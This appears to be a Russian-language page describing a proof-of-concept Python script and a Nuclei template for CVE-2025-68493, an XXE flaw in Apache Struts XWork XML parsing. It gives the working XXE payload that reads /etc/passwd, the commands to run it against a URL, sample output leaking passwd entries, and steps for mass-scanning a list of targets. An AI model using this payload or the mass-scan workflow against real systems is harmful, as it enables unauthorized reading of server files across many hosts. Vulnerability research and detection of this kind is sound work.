
CVE-2025-68493
CVE-2025-68493
[1] Apache Struts XWork XML уязвимость CVE-2025-68493 PoC и скрипты | ZONE.CI Глобальная сеть. https://zone.ci/secarticles/wx/486533.html
Для проверки и использования уязвимости CVE-2025-68493 можно использовать предоставленный Python PoC скрипт и шаблон Nuclei YAML.
Имя скрипта: cve_2025_68493_poc.py
Функция: Этот скрипт используется для проверки уязвимости на одной цели, пытаясь прочитать указанный файл (по умолчанию /etc/passwd).
Предварительные требования:
requests (pip install requests)Аргументы командной строки:
-u, --url: Базовый URL целевого приложения (например: http://127.0.0.1:8080)-f, --file: Путь к целевому файлу для чтения (по умолчанию /etc/passwd)Пример:
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd
Ожидаемый вывод:
Если цель уязвима и файл успешно прочитан, будет показано что-то вроде следующего:
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------
Имя шаблона: cve-2025-68493.yaml
Функция: Этот шаблон используется для массового сканирования нескольких целей с помощью инструмента Nuclei для обнаружения уязвимости CVE-2025-68493.
Предварительные требования:
Аргументы командной строки:
-t: Путь к файлу шаблона Nuclei-u: URL одной цели-l: Файл, содержащий URL-адреса нескольких целейПримеры:
Сканирование одной цели:
nuclei -t cve-2025-68493.yaml -u http://example.com:8080
Массовое сканирование:
Предположим, у вас есть файл с именем targets.txt, в котором каждая строка содержит URL цели:
http://target1.com:8080
http://target2.com:8080
Выполните следующую команду для массового сканирования:
nuclei -t cve-2025-68493.yaml -l targets.txt